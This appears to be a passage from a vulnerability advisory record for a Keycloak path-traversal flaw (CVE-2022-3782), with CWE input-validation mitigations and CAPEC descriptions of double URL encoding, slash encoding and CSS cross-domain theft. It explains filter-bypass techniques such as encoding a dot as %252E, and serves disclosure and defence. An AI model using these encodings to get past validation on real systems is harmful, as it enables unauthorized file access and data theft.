"url": "https://github.com/keycloak/keycloak/pull/15982/commits/1987c942f527b9f3bbf2a86ba71ba8ae0154ac37"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2022-3782"
},
{
"type": "PACKAGE",
"url": "https://github.com/keycloak/keycloak"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Keycloak vulnerable to path traversal via double URL encoding "
}
Mitigation MIT-44
Strategy: Input Validation
Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names.
Mitigation MIT-5
Strategy: Input Validation
- Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
- When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
- Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
Mitigation MIT-20
Strategy: Input Validation
Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked.
CAPEC-120: Double Encoding
The adversary utilizes a repeating of the encoding process for a set of characters (that is, character encoding a character encoding of a character) to obfuscate the payload of a particular request. This may allow the adversary to bypass filters that attempt to detect illegal characters or strings, such as those that might be used in traversal or injection attacks. Filters may be able to catch illegal encoded strings, but may not catch doubly encoded strings. For example, a dot (.), often used in path traversal attacks and therefore often blocked by filters, could be URL encoded as %2E. However, many filters recognize this encoding and would still block the request. In a double encoding, the % in the above URL encoding would be encoded again as %25, resulting in %252E which some filters might not catch, but which could still be interpreted as a dot (.) by interpreters on the target.
CAPEC-468: Generic Cross-Browser Cross-Domain Theft
An attacker makes use of Cascading Style Sheets (CSS) injection to steal data cross domain from the victim's browser. The attack works by abusing the standards relating to loading of CSS: 1. Send cookies on any load of CSS (including cross-domain) 2. When parsing returned CSS ignore all data that does not make sense before a valid CSS descriptor is found by the CSS parser.
CAPEC-64: Using Slashes and URL Encoding Combined to Bypass Validation Logic
This attack targets the encoding of the URL combined with the encoding of the slash characters. An attacker can take advantage of the multiple ways of encoding a URL and abuse the interpretation of the URL. A URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE). For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc.
CAPEC-72: URL Encoding
This attack targets the encoding of the URL. An adversary can take advantage of the multiple way of encoding an URL and abuse the interpretation of the URL.